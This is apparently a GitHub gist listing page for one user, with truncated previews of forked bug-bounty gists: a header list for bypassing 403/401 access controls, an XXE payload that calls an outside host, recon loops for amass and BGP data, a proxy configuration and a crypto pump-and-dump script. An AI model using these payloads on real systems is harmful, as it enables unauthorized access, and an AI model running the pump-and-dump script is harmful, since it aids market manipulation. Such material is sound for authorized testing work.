Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
JeffreyShran
/ 403_401_oauth_HeadersBypass.txt
Created
September 22, 2021 14:40
— forked from sysevil/403_401_oauth_HeadersBypass.txt
403Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CF-Connecting-IP: 127.0.0.1 | |
| Content-type: 0 | |
| Fastly-Client-IP: 127.0.0.1 | |
| Forwarded: 127.0.0.1 | |
| Forwarded: for=127.0.0.1 | |
| Forwarded-For: 127.0.0.1 | |
| Forwarded-For-Ip: 127.0.0.1 | |
| True-Client-IP: 127.0.0.1 | |
| X-Client-IP: 127.0.0.1 | |
| X-Cluster-Client-IP: 127.0.0.1 |
JeffreyShran
/ pump_dump.py
Created
February 21, 2021 14:42
— forked from talesa/pump_dump.py
Short script to for pump and dumps, you have to execute this code line by line so use `jupyter notebook` or `hydrogen` inside `atom` editor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # you have to execute this code line by line so use jupyter notebook or hydrogen inside atom editor | |
| # import libraries | |
| import ccxt | |
| from datetime import datetime | |
| # create exchange API handle | |
| exchange = getattr(ccxt, 'binance')() | |
| # paste in your API key and secret here (if you're afraid they're gonna get stolen, inspect the ccxt library open source code on github) | |
| exchange.apiKey = '' |
JeffreyShran
/ bb-foxyproxy-pattern.json
Created
June 24, 2020 09:30
— forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
JeffreyShran
/ screen.py
Created
June 16, 2020 11:04
— forked from si9int/screen.py
Performing screenshots on URLS given via STDIN. Chromium and Chromedriver required! Configuration infile.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # v.0.1 - by SI9INT (https://si9int.sh) | |
| # Chromium and chromedriver required, be sure to check if both version are the same | |
| # `mkdir screens` to get started, script won't create the folder | |
| import queue, threading, sys | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| CHROME_PATH = '/usr/bin/chromium' |
JeffreyShran
/ bad_proxies
Created
March 27, 2020 13:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 202.93.224.226 |
JeffreyShran
/ WAHH_Task_Checklist.md
Created
February 21, 2020 10:38
— forked from amotmot/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
JeffreyShran
/ amass_intel_for_loop
Created
February 21, 2020 10:31
— forked from jhaddix/amass_intel_for_loop
Foir loop to run amass intel for easy killing of single thread
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for i in $(cat yahoobgp); do echo""; echo "ASN $i";echo ""; amass.netdomains -asn $i;echo ""; done |
JeffreyShran
/ bgp.sh
Created
February 21, 2020 10:31
— forked from jhaddix/bgp.sh
copy in bghp.he.net to this script and get amass command
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| expand $1 |cut -d " " -f1|sed 's/AS//g' | |
| echo "" | |
| echo "" | |
| lined=`expand $1 |cut -d " " -f1|sed 's/AS//g'| tr '\n' ','` |
JeffreyShran
/ XXE_payloads
Created
December 4, 2019 16:15
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
NewerOlder